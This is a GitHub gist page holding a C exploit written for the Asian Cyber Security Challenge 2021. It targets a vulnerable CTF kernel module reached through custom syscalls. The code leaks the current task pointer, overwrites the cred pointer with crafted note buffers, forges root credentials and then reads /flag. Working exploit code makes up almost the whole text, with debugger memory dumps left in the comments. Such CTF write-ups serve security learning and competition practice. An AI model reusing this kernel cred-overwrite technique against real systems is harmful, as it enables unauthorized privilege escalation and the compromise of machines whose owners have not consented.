Created
September 19, 2021 03:13
-
-
Save lordidiot/7990a49e1336b21abc6bd90c6f837cd6 to your computer and use it in GitHub Desktop.
Asian Cyber Security Challenge 2021 Exploits
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <fcntl.h> | |
#include <stdlib.h> | |
#include <string.h> | |
#include <unistd.h> | |
#include <sys/stat.h> | |
#include <sys/types.h> | |
#include <sys/syscall.h> | |
#define ADD 548 | |
#define DEL 549 | |
#define SHOW 550 | |
#define COPY 551 | |
#define CURR 552 | |
void _pause(){ | |
char a; | |
printf("[+] Press anything to continue\n"); | |
read(0, &a, 1); | |
} | |
int main(){ | |
void * current = (void*)syscall(CURR); | |
printf("[+] current: %p\n", current); | |
// Copy to note | |
char * s = malloc(0x1000); | |
printf("[+] s: %p\n", s); | |
memset(s, 'A', 0x408); | |
s[0x408] = '\x00'; | |
syscall(ADD, s); | |
// Leak pointers | |
syscall(SHOW, s); | |
// Overwrite * cred | |
// 81:0408│ 0x186bf88 —▸ 0xffff9e2782454840 ◂— add al, byte ptr [rax] /* 0x3e800000002 */ | |
// 82:0410│ 0x186bf90 —▸ 0xffff9e2782454840 ◂— add al, byte ptr [rax] /* 0x3e800000002 */ | |
*(void **)&s[0x410] = current+0x6a8; | |
*(void **)&s[0x78] = current+0x6a8; | |
*(void **)&s[0x80] = current+0x6a8; | |
*(void **)&s[0x88] = current+0x6a8; | |
*(void **)&s[0x90] = current+0x6a8; | |
*(void **)&s[0x110] = current+0x6a8; | |
syscall(ADD, s); | |
// Setup cred | |
// 08:0040│ 0xffff8cfc82456880 ◂— 0x1ffffffffff | |
// 09:0048│ 0xffff8cfc82456888 ◂— 0 | |
// ... ↓ 5 skipped | |
// 0f:0078│ 0xffff8cfc824568b8 —▸ 0xffff8cfc82404160 ◂— add dword ptr [rax], eax /* 0x100000001 */ | |
// 10:0080│ 0xffff8cfc824568c0 —▸ 0xffff8cfc823f1e80 ◂— add eax, 0x2000000 /* 0x200000005 */ | |
// 11:0088│ 0xffff8cfc824568c8 —▸ 0xffffffff99a4d5a0 ◂— 1 | |
// 12:0090│ 0xffff8cfc824568d0 —▸ 0xffff8cfc813e2cc0 ◂— add eax, 0x1000000 /* 0x100000005 */ | |
// 22:0110│ 0xffff8b1082455950 —▸ 0xffff8b10824559c0 ◂— 0 | |
memset(s, '\x00', 0x400); | |
*(void **)&s[0x40] = 0x1ffffffffff; | |
*(void **)&s[0x78] = current+0x6a8; | |
*(void **)&s[0x80] = current+0x6a8; | |
*(void **)&s[0x88] = current+0x6a8; | |
*(void **)&s[0x90] = current+0x6a8; | |
*(void **)&s[0x110] = current+0x6a8; | |
syscall(COPY, s); | |
char flag[100]; | |
int fd = open("/flag", O_RDONLY); | |
read(fd, flag, 100); | |
puts(flag); | |
close(fd); | |
// Pause to debug | |
_pause(); | |
return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment